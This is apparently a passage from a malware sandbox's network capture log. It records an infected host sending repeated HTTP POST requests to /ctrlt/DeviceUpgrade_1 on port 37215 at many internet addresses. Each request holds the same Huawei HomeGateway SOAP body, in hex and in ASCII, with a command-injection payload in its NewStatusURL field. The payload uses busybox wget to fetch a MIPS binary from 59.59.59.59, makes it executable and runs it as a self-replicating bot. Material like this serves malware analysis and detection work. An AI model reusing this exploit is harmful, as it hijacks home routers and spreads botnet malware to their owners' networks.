                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          893192.168.2.1560280197.232.159.3537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.680037022 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          894192.168.2.156028041.144.78.6737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.680088997 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          895192.168.2.1535256197.65.77.10637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.680144072 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          896192.168.2.1547720157.179.143.13537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.680191994 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          897192.168.2.1533566175.211.214.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.680221081 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          898192.168.2.153545432.184.93.1837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.680239916 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          899192.168.2.1548422157.76.3.24537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.685071945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          900192.168.2.153597641.3.16.7137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.685156107 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          901192.168.2.1553008197.52.213.22937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.685350895 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          902192.168.2.1554072157.46.220.7937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.685386896 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
